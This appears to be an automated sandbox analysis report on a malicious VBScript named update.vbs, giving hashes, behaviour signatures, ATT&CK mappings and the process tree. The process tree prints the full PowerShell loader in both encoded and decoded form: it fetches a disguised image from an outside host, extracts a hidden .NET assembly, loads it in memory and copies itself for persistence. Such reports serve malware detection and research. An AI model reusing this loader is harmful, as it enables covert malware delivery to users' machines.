Analysis

  • max time kernel
    118s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    16-03-2024 03:37

General

  • Target

    update.vbs

  • Size

    35KB

  • MD5

    dae93d3eddca85b787392d52c5a6fc75

  • SHA1

    0910dde04380ab5a7331476b27a33789aac76524

  • SHA256

    96f6c7e573af91ae336eddf40d48ded90ff4df69e510791b715f6941fd795b8b

  • SHA512

    3d6a4e360710247a9c9a16bbc450984341426eff7b51f433ce640f4be32ef893eaf093316124b675e73a2840523314c0f7e7aed8725867e3b1d80f54c73d4aa0

  • SSDEEP

    192:96EQ6mlKX/DZp2ZSh0RuzX+yvpKkKWKQ5DcYUvhAqkw4KBK428rKp9KZKySB3Kj7:24/XrvkBD0kJdc4fWpw0fB4

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\update.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2356
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$numa = 'ZgB1AG4AYwB0AGkAbwBuACAARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEARgByAG8AbQBMAGkAbgBrAHMAIAB7ACAAcABhAHIAYQBtACAAKABbAHMAdAByAGkAbgBnAFsAXQBdACQAbABpAG4AawBzACkAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgAEAAKAApADsAIAAkAHMAaAB1AGYAZgBsAGUAZABMAGkAbgBrAHMAIAA9ACAAJABsAGkAbgBrAHMAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAAJABsAGkAbgBrAHMALgBMAGUAbgBnAHQAaAA7ACAAZgBvAHIAZQBhAGMAaAAgACgAJABsAGkAbgBrACAAaQBuACAAJABzAGgAdQBmAGYAbABlAGQATABpAG4AawBzACkAIAB7ACAAdAByAHkAIAB7ACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAArAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGwAaQBuAGsAKQAgAH0AIABjAGEAdABjAGgAIAB7ACAAYwBvAG4AdABpAG4AdQBlACAAfQAgAH0AOwAgAHIAZQB0AHUAcgBuACAAJABkAG8AdwBuAGwAbwBhAGQAZQBkAEQAYQB0AGEAIAB9ADsAIAAkAGwAaQBuAGsAcwAgAD0AIABAACgAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA3ADUANQAvADkAOQA3AC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUAXwByAC4AagBwAGcAPwAxADcAMQAwADQAMQAzADkAOQAzACcALAAgACcAaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANwA1ADUALwA5ADkANwAvAG8AcgBpAGcAaQBuAGEAbAAvAG4AZQB3AF8AaQBtAGEAZwBlAF8AcgAuAGoAcABnAD8AMQA3ADEAMAA0ADEAMwA5ADkAMwAnACkAOwAgACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIABEAG8AdwBuAGwAbwBhAGQARABhAHQAYQBGAHIAbwBtAEwAaQBuAGsAcwAgACQAbABpAG4AawBzADsAIABpAGYAIAAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAgACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAHMAdABhAHIAdABJAG4AZABlAHgALAAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAKQA7ACAAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAgACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAgACQAdAB5AHAAZQAgAD0AIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFAAUgBPAEoARQBUAE8AQQBVAFQATwBNAEEAQwBBAE8ALgBWAEIALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBzAGIAZAB2ADEALwBLAC8AcQBpAC4AZABlAGgAcwBhAGgALQBzAHMAcgBpAC8ALwA6AHMAcAB0AHQAaAAnACAALAAgACcAMQAnACAALAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAJwAgACwAIAAnAE4AYQBtAGUAXwBGAGkAbABlACcALAAnAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzADMAMgAnACwAJwAnACkAKQB9ACAAfQA=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $numa));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993', 'https://uploaddeimagens.com.br/images/004/755/997/original/new_image_r.jpg?1710413993'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.sbdv1/K/qi.dehsah-ssri//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','AddInProcess32',''))} }"
        3⤵
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2592
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Name_File.vbs
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1688

Network

MITRE ATT&CK Matrix ATT&CK v13

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

System Information Discovery

1
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    67KB

    MD5

    753df6889fd7410a2e9fe333da83a429

    SHA1

    3c425f16e8267186061dd48ac1c77c122962456e

    SHA256

    b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

    SHA512

    9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    711a623f5336daf51e25b7e2584a78b0

    SHA1

    40cab466cf1bb7e4476708d69c137254547dc1e5

    SHA256

    e9aefe6fc4f4cabaaaeae1b7ce40e9d27790ebc4be5ab35fafad620f4a75213a

    SHA512

    a0ab443abf6e62efb2c13e5335acb143dd3f334bd27cae5904899637efe4452d25a9d9e210a1d12d04cd22e1719769f308280a9839e01870b581628614f8fa1a

  • C:\Users\Admin\AppData\Local\Temp\Cab1086.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar1233.tmp
    Filesize

    175KB

    MD5

    dd73cead4b93366cf3465c8cd32e2796

    SHA1

    74546226dfe9ceb8184651e920d1dbfb432b314e

    SHA256

    a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

    SHA512

    ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    0fe21ce8822f508cde7b0e08d6f1fbaf

    SHA1

    fe2863a2b5e2cacdb776709897f06ec48a0ba94b

    SHA256

    b68b55603e2c31c7d8148ea2d53cba3e0724f6d95e3ed4631582de64e5794f44

    SHA512

    d9531c4503333d497b9e5e3992db903ce96c4496d283c5de6e3dea582ecee4070b4b9c13f45ede6039318e672a156c512343512fe91dd003a64877e9fd0ff82a

  • memory/1688-107-0x0000000002AD0000-0x0000000002B50000-memory.dmp
    Filesize

    512KB

  • memory/1688-106-0x0000000002AD0000-0x0000000002B50000-memory.dmp
    Filesize

    512KB

  • memory/1688-104-0x0000000002AD0000-0x0000000002B50000-memory.dmp
    Filesize

    512KB

  • memory/1688-105-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/1688-110-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/1688-103-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2128-7-0x0000000002C10000-0x0000000002C90000-memory.dmp
    Filesize

    512KB

  • memory/2128-19-0x0000000002C10000-0x0000000002C90000-memory.dmp
    Filesize

    512KB

  • memory/2128-13-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2128-14-0x0000000002C10000-0x0000000002C90000-memory.dmp
    Filesize

    512KB

  • memory/2128-6-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2128-5-0x0000000002730000-0x0000000002738000-memory.dmp
    Filesize

    32KB

  • memory/2128-87-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2128-88-0x0000000002C10000-0x0000000002C90000-memory.dmp
    Filesize

    512KB

  • memory/2128-89-0x0000000002C10000-0x0000000002C90000-memory.dmp
    Filesize

    512KB

  • memory/2128-90-0x0000000002C10000-0x0000000002C90000-memory.dmp
    Filesize

    512KB

  • memory/2128-4-0x000000001B690000-0x000000001B972000-memory.dmp
    Filesize

    2.9MB

  • memory/2128-113-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2592-16-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2592-94-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2592-97-0x000000001ADF0000-0x000000001B0B0000-memory.dmp
    Filesize

    2.8MB

  • memory/2592-93-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB

  • memory/2592-92-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2592-91-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB

  • memory/2592-20-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2592-18-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB

  • memory/2592-17-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB

  • memory/2592-111-0x000007FEF5D00000-0x000007FEF669D000-memory.dmp
    Filesize

    9.6MB

  • memory/2592-112-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB

  • memory/2592-15-0x0000000002900000-0x0000000002980000-memory.dmp
    Filesize

    512KB